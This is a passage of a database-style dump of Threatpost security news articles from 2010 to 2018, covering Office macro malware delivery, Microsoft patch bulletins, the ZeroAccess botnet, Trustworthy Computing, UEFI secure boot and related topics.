analyzed in August.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/13142638/Cofense-loaders.png>)\n\nTop Malware Delivery Mechanisms in August\n\nJust behind this tried-and-true method lies the Microsoft Office Memory Corruption Vulnerability ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), a bug that allows the attacker to perform arbitrary code-execution. In a [report](<https://cofense.com/microsoft-office-macros-still-leader-malware-delivery>) released Thursday from Cofense intelligence, it was shown to responsible for 37 percent of malware delivery last month, despite having been patched since last November.\n\nThe remaining 18 percent of delivery mechanisms spotted in August is mainly made up of batch scripts, PowerShell scripts and downloaders for Microsoft Windows scripting component ([WSC](<http://filext.com/file-extension/WSC>)) files (often seen in games). These all trail far, far behind the two leading vectors, with less than 6 percent of attacks each.\n\n**Macros a Major Problem**\n\nThe report shows that weaponized Microsoft Office documents delivered via email maintain their strong hold as the \u201cdelivery mechanism du jour\u201d \u2013 and notably, not just for the low-hanging fruit types of campaigns that make use of spray-and-pray mass spam efforts.\n\nMacros, of course, make a lot of sense for delivering a malicious payload to the endpoint because they they can be allowed with a simple, single mouse-click on the part of the user when prompted. And, although Microsoft disables them in Microsoft Office by default, some enterprises have turned them on, so a user may have no other indication that anything is amiss.\n\n\u201cThis makes it almost trivial to launch the first stage of an infection chain,\u201d said Cofense researcher Aaron Riley. \u201cMacros, used as such, are embedded Visual Basic scripts typically used to facilitate either the download or direct execution of further payloads.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/13143100/cofense-payloads.png>)\n\nTop Macro-Delivered Payloads\n\nCofense found that while the macro approach is easy to execute and has an extremely low barrier-to-entry, the malware being delivered includes the most malignant out there, including [Geodo](<https://threatpost.com/cridex-variant-geodo-part-trojan-part-email-worm/106943/>) (accounting for the majority of the observed macro-delivered payloads), [Chanitor/Hancitor](<https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/>) (the second-most delivered payload), [AZORult](<https://threatpost.com/updated-azorult-spyware-comes-with-sophisticated-new-techniques/134555/>) and [GandCrab](<https://threatpost.com/gandcrabs-rotten-eggs-hatch-ransomware-in-south-korea/136689/>) \u2013 along with more commodity fare like [TrickBot](<https://threatpost.com/new-trickbot-variant-touts-stealthy-code-injection-trick/136606/>).\n\n\u201cThe range of different types of malware, from simple bots to ransomware, shows that mature and amateur operators alike are using this vehicle to get the payload to the endpoint,\u201d Riley noted.\n\n**A Known Vulnerability**\n\nThe analysis also uncovered that, almost as prevalent as macros, the CVE-2017-11882 vulnerability found in the Microsoft Office Equation Editor Component is the second-most used attack vector for delivering malware.\n\n\u201cThe vulnerability resides in the Equation Editor Component which, when used, runs as its own process (eqnedt32.exe),\u201d Oleg Kolesnikov, researcher at Securonix, explained to us recently. \u201cBecause of the way it was implemented, it doesn\u2019t support Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). A malicious document exploits the vulnerability to execute a command.\u201d\n\nThe Microsoft Office Memory Corruption Vulnerability (CVE-2017-11882) is being used in the wild by the [Osiris banking trojan](<https://threatpost.com/osiris-banking-trojan-displays-modern-malware-innovation/137393/>), the [FELIXROOT](<https://threatpost.com/felixroot-backdoor-resurfaces-in-environmental-spam-campaign/134515/>) backdoor malware, and a legitimate tool that\u2019s being abused as spyware called [Imminent Monitor](<https://threatpost.com/targeted-spy-campaign-hits-russian-service-centers/132639/>) \u2013 among many others.\n\nThe takeaway? Though [new types of document attacks](<https://threatpost.com/word-attachment-delivers-formbook-malware-no-macros-required/131075/>) are emerging that target inboxes and do not require macros to trigger an infection chain \u2013 and even though stealthy approaches using [lightweight scripts](<https://threatpost.com/bad-actors-sizing-up-systems-via-lightweight-recon-malware/137364/>) are on the rise, for now, macros are still tops in cybercriminals\u2019 playbooks, along with betting on unpatched machines. So, basic security hygiene remains, for now, the best first defense for users.\n", "cvss3": {}, "published": "2018-09-13T19:26:42", "type": "threatpost", "title": "ThreatList: Microsoft Macros Remain Top Vector for Malware Delivery", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-09-13T19:26:42", "id": "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "href": "https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:59:23", "description": "The expected continued respite from deploying Internet Explorer patches was apparently a mirage as Microsoft changed course from last Thursday\u2019s advance notification and added two more bulletins to the [February 2014 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-feb>), including the first IE rollup of 2014.\n\nIE had patched monthly for close to a year until the January security bulletins were released, and eyebrows were raised again last Thursday when there was no mention of an IE update.\n\nToday, however, Microsoft reversed course with [MS14-010](<https://technet.microsoft.com/en-us/security/bulletin/ms14-010>), which patches 24 vulnerabilities in the browser, including one that has been publicly disclosed. No active exploits have been reported, Microsoft said.\n\nAll of the vulnerabilities enable remote code execution, and affect versions of IE going back to IE 6 on Windows XP up to IE 11 on Windows 8.1. More than 20 CVEs involving memory corruption vulnerabilities in IE were addressed along with a cross-domain information disclosure vulnerability, an elevation of privilege vulnerability and a memory corruption issue related to VBScript that is addressed in [MS14-011](<https://technet.microsoft.com/en-us/security/bulletin/ms14-011>).\n\nA IE user would have to be lured to a website hosting an exploit for the vulnerability in the VBScript scripting engine in Windows. The engine improperly handles objects in memory, Microsoft said, and an exploit could corrupt memory and allow an attacker to run code on a compromised machine.\n\n\u201cTo go from five to seven bulletins says to me that initial testing was completed last minute so they decided to slip the patch in or testing found an issue and engineer shipped a fix last minute,\u201d said Tyler Reguly, manager of security research at Tripwire. \u201cEither way, pay extra attention to MS14-010 and MS14-011 in your test environments this month before you push them out enterprise wide.\u201d\n\nColleague Craig Young cautions that a number of the IE vulnerabilities can be combined to gain admin access on compromised machines.\n\n\u201cWithout any doubt, attacks in the wild will continue and expand to the other vulnerabilities being fixed today,\u201d Young said.\n\nAs promised, Microsoft did patch a remote code execution vulnerability, [MS14-008](<https://technet.microsoft.com/en-us/security/bulletin/ms14-008>), in its Forefront Protection for Exchange 2010 security product. Microsoft said it removed the offending code from the software.\n\n\u201cI\u2019m sure a lot of people will call attention to the Forefront Protection for Exchange patch this month. However when Microsoft, the people with the source code, tells us they can\u2019t trigger the vulnerability in a meaningful way, I intend to believe them,\u201d said Tripwire\u2019s Reguly. \u201cI suspect we\u2019ll wake up tomorrow and beyond pressing apply, we\u2019ll forget this was even released.\u201d\n\nMicrosoft stopped updating Forefront for Exchange as of September 2012, but will support it with security updates for another 22 months\n\n\u201cThis should make administrators think about upgrading their Exchange servers to the latest version (which includes basic anti-malware protection by default) or consider a third party email security application,\u201d said Russ Ernst of Lumension. \u201cAdministrators that currently use Forefront Protection for Exchange have until December 2015 to get this done.\u201d\n\nThe final critical bulletin, [MS14-007](<https://technet.microsoft.com/en-us/security/bulletin/ms14-007>), is another remote code execution bug in Direct2D, which can only be triggered viewing malicious content in IE. Direct2D is a graphics API used for rendering 2-D geometry, bitmaps and text, Microsoft said. This vulnerability affects Windows 7 through Windows 8.1.\n\nMicrosoft also released three bulletins rated important that patch privilege elevation, information disclosure and denial of service vulnerabilities.\n\n * [MS14-009](<https://technet.microsoft.com/en-us/security/bulletin/ms14-009>) patches two publicly disclosed bugs in the .NET framework that could allow an attacker to elevate their privileges on a compromised machine.\n * [MS14-005](<https://technet.microsoft.com/en-us/security/bulletin/ms14-005>) handles a vulnerability in Microsoft XML Core Services that could lead to information disclosure if the victim visits a malicious site with IE.\n * [MS14-006](<https://technet.microsoft.com/en-us/security/bulletin/ms14-006>) addresses a denial-of-service vulnerability in Windows 8, RT, and Server 2012, that has been publicly disclosed. An attacker would have to send a large number of malicious IPv6 packets to a vulnerable system to exploit the bug, and the attacker must be on the same subnet as the victim.\n\nMicrosoft also sent out an update that officially [deprecates the use of the MD5 hash algorithm](<http://threatpost.com/light-microsoft-patch-load-precedes-md5-deprecation/104104>). Digital certificates with MD5 hashes issued under roots in the Microsoft root certificate program are from now on restricted.\n\n\u201cCertificates with MD5 hashes should no longer be considered safe,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing. \u201cWe\u2019ve given our customers six months to prepare their environments, and now this update is available through automatic updates.\u201d\n", "cvss3": {}, "published": "2014-02-11T14:19:34", "type": "threatpost", "title": "February 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-11T19:19:34", "id": "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "href": "https://threatpost.com/microsoft-adds-critical-ie-patches-under-the-wire/104214/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Long thought dead, the peer-to-peer (P2P) ZeroAccess botnet has resurfaced, and as of just a few weeks ago, has returned to propagating click-fraud scams.\n\nResearchers with Dell\u2019s SecureWorks [revealed Wednesday](<http://www.secureworks.com/resources/blog/zeroaccess-botnet-resumes-click-fraud-activity-after-six-month-break/>) that they witnessed the botnet restart itself from March 21 to July 2, 2014 and that halfway through this month \u2013 six months after it was last seen \u2013 the botnet has apparently gone back to its old ways and is again doling out click-fraud templates.\n\nClick-fraud, one of the easier techniques cybercriminals use to monetize malware, is essentially the embezzling of ad revenue from clicks that don\u2019t come from legitimate customers.\n\nDespite the botnet\u2019s resurfacing, researchers insist it hasn\u2019t grown or even tried to incorporate new compromises. Instead the botnet, which has split into two smaller botnets that use different UDP ports, is built around hosts from past infections.\n\nAs seen below, researchers found ZeroAccess in two smaller botnets in both 32-bit (blue) and 64-bit (gray) compromised Windows systems.\n\n\n\n\u201cCompromised systems act as nodes in the P2P network, and they periodically receive new templates that include URLs for attack-controlled template servers,\u201d the firm\u2019s Counter Threat Unit (CTU) wrote.\n\nOnce the URLs are visited, like a chain reaction, the bots are redirected to their final destination.\n\nThe unit claims it counted 55,000-plus different IP addresses \u2013 mostly in Japan, India and Russia \u2013 engaging with the botnet from Jan. 17 to Jan. 25. Some may consider 55K small potatoes compared to the botnet\u2019s heyday, when Microsoft cleaned half a million machines of the virus from Feb. to March 2013, but Dell is stressing that for all intents and purposes ZeroAccess should still be considered substantial.\n\nAdding that it may not be able to do what other flashy botnets can, like carry out banking fraud or hold users\u2019 files ransom, ZeroAccess can still wreak havoc on advertisers and machines it infects alike.\n\nIt was thought the [botnet was dead](<http://threatpost.com/microsoft-zeroaccess-botnet-has-been-abandoned/103273>) in December 2013 after Microsoft, along with Europol\u2019s European Cybercrime Centre (EC3), the F.B.I., and the firm A10 [disrupted ZeroAccess\u2019s](<http://threatpost.com/microsoft-and-friends-take-down-zeroaccess-botnet/103122>) two million odd machines. Click-fraud is just one of the botnet\u2019s favorite pastimes. ZeroAccess, a/k/a Sirefef, has also been seen hijacking search results and redirecting victims to malicious, information stealing websites and for a short stint the platform was even spotted [facilitating Bitcoin mining](<http://threatpost.com/zeroaccess-botnet-cashing-click-fraud-and-bitcoin-mining-103012/77168>).\n\n[Microsoft greatly curbed](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/100717>) the botnet\u2019s click-fraud tendencies in May 2013 after it added its signature to its Malicious Software Removal Tool (MSRT) and cleaned all the infected machines it could find of ZeroAccess.\n", "cvss3": {}, "published": "2015-01-29T14:25:48", "type": "threatpost", "title": "ZeroAccess Returns, Resumes Click-Fraud Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:27", "id": "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "href": "https://threatpost.com/zeroaccess-botnet-returns-resumes-click-fraud-activity/110736/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:03", "description": "[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/10/07040458/andrew_storms.jpg>)On Oct. 9, 2003, Microsoft announced its new security patching process that would end up being a catalyst for significant change in the information security community. Ten years ago, the program was announced with a press release that promised\n\n * \u201cImproved patch management processes, policies and technologies to help customers stay up to date and secure.\u201d\n * \u201cGlobal education programs to provide better guidance and tools for securing systems.\u201d\n\nWithin the [press release](<http://www.prnewswire.com/news-releases/microsoft-outlines-new-initiatives-in-ongoing-security-efforts-to-help-customers-72447792.html>), chief executive officer Steve Ballmer said: \u201cOur goal is simple: Get our customers secure and keep them secure. Our commitment is to protect our customers from the growing wave of criminal attacks.\u201d\n\nThose of us working in the security industry or with corporate information security responsibility saw this as a direct response from the famous [Trustworthy Computing memo](<http://www.microsoft.com/en-us/news/features/2012/jan12/gatesmemo.aspx>) penned by Bill Gates in January 2002. The signs were clear. Microsoft was faced with a serious dilemma. Its software was riddled with security holes that were having a direct negative effect on its customers\u2019 security, availability and privacy. In corporate IT, Microsoft had quickly gotten its own nickname of \u201cnecessary evil.\u201d IT managers were forced to use Microsoft software for its business features, but it came at the cost of serious security risks.\n\nWhether you have like or disdain for Microsoft, the new security initiatives started 10 years ago created a great wave of change in our information security industry.\n\nFor starters, Microsoft proved to the security community that communication is a key cornerstone to vendor relationships. No one likes to admit they have security problems. Microsoft took the leap of not only admitting it had a problem, but also committed to delivering ongoing communications to its customers and to all computing users. Microsoft started blogging about security issues and also embarked on serious outbound communication campaigns to educate users.\n\nMicrosoft showed that communication and relationships are a two-way street. The powerhouse eventually grew to an age where it embraced the same community of people who were responsible for finding and publicly releasing security holes in its software. Today public disclosure of serious Microsoft security holes is now the exception.\n\nAlso, resource planning is table stakes in the enterprise IT world. Being a cost center doesn\u2019t help much, but IT has traditionally been underfunded and underappreciated. What is an enterprise IT or security manager supposed to do when their primary software vendor springs on them a critical security patch with do-or-die consequences? Historically, and still the case today, a lot of ongoing projects get dropped to quickly reallocate resources to the moment\u2019s critical security patch. Living in a world of constant interruption is detrimental to morale completion of any planned projects.\n\nWith Microsoft\u2019s new consistent patch release timing, enterprise IT could depend on a schedule and allocate resources accordingly. The monthly patching cycle soon became better known as Patch Tuesday. Later in Microsoft\u2019s maturity model, it would introduce the advanced notification service. We know this today as the Thursday before Patch Tuesday, when we receive a high level snippet of what to expect the following week.\n\nMicrosoft also proved value with consistency in other ways. For example, Microsoft took the early bold step of defining its security criticality ratings and made the definitions public. Even Microsoft\u2019s security bulletin text format and sections were delivered in a consistent format that security professionals have come to rely upon. Security people like repeatable and dependable systems. Microsoft delivered just that.\n\nThree cheers to Patch Tuesday. It\u2019s the second Tuesday of each month that we both love and hate. Ten years ago, the Patch Tuesday initiatives created profound benefits to all Microsoft consumers by making it easier to keep systems patched and more secure. At the time, the idea seemed so foreign, but has since gained so much following that other vendors such as Cisco, Adobe and Oracle have followed suit. Spend just five minutes today and consider where you\u2019d be today without Microsoft taking the leap 10 years ago.\n\n_Andrew Storms is the Director of DevOps for CloudPassage.___\n", "cvss3": {}, "published": "2013-10-02T09:40:46", "type": "threatpost", "title": "A Decade of Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-10-07T15:44:02", "id": "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "href": "https://threatpost.com/take-time-to-reflect-as-microsoft-patch-tuesday-turns-10/102488/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "Scott Charney, the head of Microsoft\u2019s Trustworthy Computing efforts, said that he was the one who decided it was time to [move the TwC group in a new direction](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and integrate the security functions more deeply into the company as a whole.\n\n\u201cI was the architect of these changes. This is not about the company\u2019s loss of focus or diminution of commitment. Rather, in my view, these changes are necessary if we are to advance the state of trust in computing,\u201d Charney, the corporate vice president of Trustworthy Computing at Microsoft, wrote in a blog post.\n\nThe Trustworthy Computing team was an outgrowth of the effort that Microsoft started in 2002 to build more secure software. Modest at first, the TwC group eventually grew into a large team of engineers, developers and executives and became one of the more influential groups in the company. Charney, a former Department of Justice lawyer who joined Microsoft just as the security push was getting off the ground in 2002, said that the move to disperse the TwC team into different groups and change the reporting structure would help the company react more quickly and be more efficient with security related decisions.\n\n\u201cBy consolidating work within the company, as well as altering some reporting structures, Microsoft will be able to make a number of trust-related decisions more quickly and execute plans with greater speed, whether the objective is to get innovations into the hands of our customers, improve our engineering systems, ensure compliance with legal or corporate policies, or engage with regulators around the world,\u201d Charney wrote in the [post](<http://blogs.microsoft.com/cybertrust/2014/09/22/looking-forward-trustworthy-computing/>).\n\nOne of the key functions of the TwC team over the years has been the development and implementation of the Security Development Lifecycle, the comprehensive development, engineering and deployment program that\u2019s meant to build security into the company\u2019s products from the beginning. Charney said that the SDL will remain the responsibility of the part of the TwC group that\u2019s moving to the Cloud and Enterprise Division.\n\n\u201cI will continue to lead the Trustworthy Computing team in our new home as part of the Cloud and Enterprise Division. Significantly, Trustworthy Computing will maintain our company-wide responsibility for centrally driven programs such as the Security Development Lifecycle (SDL) and Online Security Assurance (OSA). But this change will also allow us to embed ourselves more fully in the engineering division most responsible for the future of cloud and security, while increasing the impact of our critical work on privacy issues by integrating those functions directly into the appropriate engineering and legal policy organizations,\u201d Charney said.\n\nThe change to the TwC group became public last week as the company was in the process of laying off 2,100 employees as part of a series of internal changes.\n", "cvss3": {}, "published": "2014-09-23T08:53:50", "type": "threatpost", "title": "Charney on Trustworthy Computing: 'I Was the Architect of These Changes'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-25T18:08:18", "id": "THREATPOST:04738138B50414CEACDB62EFA6D61789", "href": "https://threatpost.com/charney-on-trustworthy-computing-i-was-the-architect-of-these-changes/108455/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:49", "description": "[](<https://threatpost.com/microsoft-releases-new-regex-fuzzer-101310/>)Microsoft has released a new fuzzing tool designed specifically to find mistakes in regular expressions in application code that could be vulnerable to attack. The [SDL Regex Fuzzer](<https://www.microsoft.com/downloads/en/details.aspx?FamilyID=8737519c-52d3-4291-9034-caa71855451f>) identifies problematic lines that might cause an application to be susceptible to attacks that consume huge amounts of resources and cause denial-of-service conditions.\n\nThe new fuzzer is meant to be used specifically to find vulnerable regular expressions in application code that could lead to a special kind of attack known as a ReDoS. Microsoft officials say that as more and more applications are moved to cloud providers, attackers will begin to focus their attention on those applications in new and profitable ways.\n\n\u201cI\u2019ve [predicted](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) before that as cloud computing gains wider adoption, we\u2019ll start to see a significant increase in denial of service (DoS) attacks against those services. When you\u2019re paying for the processor time, bandwidth and storage that your applications use, attacks that explicitly target and consume those resources can get very expensive very quickly, not to mention the costs of downtime for legitimate users. Attackers will shift from pursuing elusive privilege elevation vulnerabilities to simply blackmailing SaaS providers: pay me $10,000 or I\u2019ll make your app consume $20,000 worth of server resources,\u201d Microsoft\u2019s Bryan Sullivan wrote in a blog post explaining the SDL Regex Fuzzer.\n\nAs Sullivan explains in an [article](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) on the problem from earlier this year, a small change to an input string can cause major problems for a regular expression engine.\n\n\u201cHere is where things get \u2018interesting\u2019 (as in horribly dangerous). \nInstead of just checking that the next character after 5 is not the end \nof the string, the engine treats the next character, 6, as a new capture \ngroup and starts rechecking from there. Once that route fails, it backs \nup to 1234 and then tries 56 as a separate capture group, then 5 and 6 \neach as separate capture groups. The end result is that the engine \nactually ends up evaluating 32 different paths,\u201d he wrote. \n\n\u201cIf we now add just \none more numeric character to the evaluation string, the engine will \nhave to evaluate 64 paths\u2014twice as many\u2014to determine that it\u2019s not a \nmatch. This is an exponential increase in the amount of work being \nperformed by the regex engine. An attacker could provide a relatively \nshort input string\u201430 characters or so\u2014and force the engine to process \nhundreds of millions of paths, tying it up for hours or days.\u201d\n\nThe new fuzzer is free to download.\n", "cvss3": {}, "published": "2010-10-13T18:08:57", "type": "threatpost", "title": "Microsoft Releases New Regex Fuzzer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:20:31", "id": "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "href": "https://threatpost.com/microsoft-releases-new-regex-fuzzer-101310/74571/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "Microsoft is looking into a potential security issue affecting its Xbox 360 video game console this week after a group of college students claimed they were able to extract the credit card information of a console\u2019s previous owner from the machine.\n\nAshley Podhradsky, Rob D\u2019Ovidio, and Cindy Casey of Drexel University and Pat Engebretson of Dakota State University reportedly bought a refurbished Xbox from a Microsoft-authorized reseller in 2011 and were able to access old files containing the credit card information of the device\u2019s first owner. Despite having its hard drive wiped and its factory settings previously reset, the console was cracked after the students installed a software \u201cmodding\u201d tool that allows Xbox owners to install applications that aren\u2019t sanctioned by Microsoft.\n\n\n\nMicrosoft called the hack unlikely in a [statement obtained by ZDNet](<http://www.zdnet.com/blog/security/microsoft-investigating-used-xbox-360-credit-card-hack/11260?tag=content;siu-container>) on Monday.\n\nJim Alkove, General Manager, Security of Microsoft\u2019s Interactive Entertainment Business division, claimed the company launched an investigation into the hack. Alkove asserted that Xbox 360 consoles are not designed to store credit card data, adding that it was unlikely any information was recovered in the fashion the hackers described.\n\n\u201cWhen Microsoft refurbishes used consoles we have processes in place to wipe the local hard drives of any other user data,\u201d Alkove said, \u201cwe can assure Xbox owners we take the privacy and security of their personal data very seriously.\u201d\n\nGawker\u2019s video game blog [Kotaku](<http://kotaku.com/5897461/hackers-can-steal-credit-card-information-from-your-old-xbox-experts-tell-us>) interviewed Podhradsky about the device\u2019s security late last week.\n\n\u201cMicrosoft does a great job of protecting their proprietary information,\u201d she told the site, \u201cbut they don\u2019t do a great job of protecting the user\u2019s data.\u201d\n\nWhile the security of Microsoft\u2019s gaming console ([Xbox Live phishing attempts](<https://threatpost.com/xbox-security-chief-says-account-hacks-linked-phishing-resale-schemes-102011/>), etc.) has been called into question before, this is one of the first reports that claim the console\u2019s physical hard drive may be at risk.\n\nNASA, whose hard drives arguably carry more sensitive information than an Xbox, [caught similar heat in 2010](<https://threatpost.com/audit-nasa-fails-properly-wipe-data-discarded-drives-120810/>) after it was found not adequately wiping, sanitizing and destroying its own hard drives.\n", "cvss3": {}, "published": "2012-04-03T21:13:12", "type": "threatpost", "title": "Microsoft to Investigate Alleged Xbox Credit Card Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:31", "id": "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "href": "https://threatpost.com/microsoft-investigate-alleged-xbox-credit-card-hack-040312/76392/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:33", "description": "[](<https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712/>)LAS VEGAS\u2013Microsoft on Thursday handed out three rather large checks to a trio of security researchers, the largest one\u2013$200,000\u2013going to Vasillis Pappas who won the company\u2019s first [Blue Hat Prize](<https://threatpost.com/three-nations-and-three-different-perspectives-blue-hat-finalists-focus-defense-072612/>) competition for defensive technologies. Pappas\u2019s kBouncer ROP mitigation technology edged out ROP-related submissions from the two other finalists, and will be integrated by Microsoft in the near future.\n\nThe company announced Pappas as the winner of the contest at its annual party at the end of the Black Hat conference here with a splashy American Idol-style reveal, complete with blaring music and a massive confetti shower. Pappas, a PhD candidate at Columbia University, has been focused on the research for his submission for more than a year. His kBouncer technology uses the kernel to enforce restrictions about what processes can do, and prevents anything that looks like return-oriented programming from running.\n\nIn addition to the $200,000 that Pappas won, Ivan Fratric was awarded $50,000 for his ROPGuard technology and Jared DeMott won $10,000 and an MSDN subscription for his /ROP submission. Microsoft officials said they were quite happy with the quality of the submissions for the contest and accomplished their stated goal of identifying innovative defensive technologies.\n\n\u201cRunning the BlueHat Prize contest allowed us insight into a greater number of people who are doing some deep thinking in the areas of security mitigation technology. This not only helps Microsoft find and work with talented people, but the spotlight that we can help shine on all of these contestants will hopefully help them market their ideas and talent so that the entire security industry can benefit and improve,\u201d [Katie Moussouris of Microsoft](<https://blogs.technet.com/b/ecostrat/archive/2012/07/26/the-bluehat-prize-v1-0-and-the-winners-are.aspx?Redirected=true>) said in a blog post on the contest.\n\nMicrosoft officials have said repeatedly in the lest few years that the company does not plan to offer bug bounties to security researchers who discover vulnerabilities in Microsoft products. Google, Mozilla and several other companies have such programs, and the Blue Hat prize was Microsoft\u2019s way of responding and attempting to focus the energy of researchers on defensive technologies instead of finding bugs.\n\n\u201cOne thing is certain \u2013 we will continue to invest in security defense at Microsoft, and we will continue to offer cash incentives to the security community for helping Microsoft, and the rest of the industry, to help improve the state of security for the entire ecosystem. In sports, as in life, a great team understands both offense and defense. To address the security threats of today and tomorrow, we as an industry need to appreciate both,\u201d Moussouris said.\n\n \n\n", "cvss3": {}, "published": "2012-07-27T13:57:41", "type": "threatpost", "title": "Vasillis Pappas Wins $200,000 Microsoft Blue Hat Prize", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:47", "id": "THREATPOST:44C93D75841336281571380C5E523A23", "href": "https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712/76857/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:47", "description": "[](<https://threatpost.com/microsoft-defends-secure-boot-windows-8-092311/>)Microsoft officials are seeking to assuage concerns that its implementation of UEFI in Windows 8 will prevent users from loading non-Microsoft operating systems or applications on their machines. Despite concerns raised by security researchers and open-source advocates about vendor lock-in and other issues arising from the use of a secure boot sequence in the upcoming OS, Microsoft says \u201cthe customer is in control of their PC.\u201d\n\nIn the days since Microsoft began talking about the details of Windows 8 and the security measures that it has added to the new version of the OS, security researchers and others have raised questions about the consequences of the implementation of the secure boot sequence that includes UEFI instead of a traditional BIOS underneath the firmware. The boot sequence for Windows 8, which is due in 2012, will be markedly different from that of its predecessors. The most notable difference is that the firmware will only load code that is signed and authenticated by a key that\u2019s embedded in the PC hardware. Any module that isn\u2019t signed won\u2019t be loaded.\n\nThe goal of this is to prevent malware such as rootkits and bootkits from staying resident on machines and reloading each time the machine is restarted. Such malware variants have become more popular in recent years as attackers have looked for new methods of keeping their attack tools on infected machines for a long period of time. That kind of malware can be difficult to detect and remove, and so Microsoft is hoping that the secure boot sequence using UEFI will help prevent it and other malicious software from making its way onto the PC in the first place.\n\n\u201cIn most PCs today, the pre-operating system environment is vulnerable to attacks by redirecting the boot loader handoff to possible malicious loaders. These loaders would remain undetected to operating system security measures and antimalware software,\u201d Microsoft\u2019s [Tony Mangefeste](<https://blogs.msdn.com/b/b8/archive/2011/09/22/protecting-the-pre-os-environment-with-uefi.aspx>) wrote in a post explaining the architectural change.\n\nHowever, critics have raised concerns that the system also gives Microsoft the ability to prevent users from running third-party operating systems such as Linux on their PCs. Ross Anderson, a security researcher at the University of Cambridge, said in a blog post yesterday that the move by Microsoft could have serious consequences.\n\n\u201cThe extension of Microsoft\u2019s OS monopoly to hardware would be a disaster, with increased lock-in, decreased consumer choice and lack of space to innovate. It is clearly [unlawful](<http://en.wikipedia.org/wiki/Article_82>) and must not succeed,\u201d Anderson wrote.\n\nMangefeste said that the secure boot sequence is designed to prevent malware from loading and not to stop users from loading other software they want to run, including alternate operating systems.\n\n\u201cAt the end of the day, the customer is in control of their PC. Microsoft\u2019s philosophy is to provide customers with the best experience first, and allow them to make decisions themselves. We work with our OEM ecosystem to provide customers with this flexibility. The security that UEFI has to offer with secure boot means that most customers will have their systems protected against boot loader attacks. For the enthusiast who wants to run older operating systems, the option is there to allow you to make that decision,\u201d Mangefeste wrote.\n\n\u201cA demonstration of this control is found in the Samsung tablet with Windows 8 Developer Preview that was offered to //BUILD/ participants. In the screenshot below you will notice that we designed the firmware to allow the customer to disable secure boot. However, doing so comes at your own risk.\u201d\n", "cvss3": {}, "published": "2011-09-23T15:14:43", "type": "threatpost", "title": "Microsoft Defends Secure Boot in Windows 8", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:43", "id": "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "href": "https://threatpost.com/microsoft-defends-secure-boot-windows-8-092311/75683/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:33", "description": "Microsoft announced Thursday that it plans to release four bulletins next week as part of the year\u2019s first batch of [Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2014/01/09/advance-notification-service-for-the-january-2014-security-bulletin-release.aspx>), none of which are rated critical.\n\nDespite the relatively light load, the patches do address a [zero-day vulnerability in Windows XP and Windows Server 2003](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) 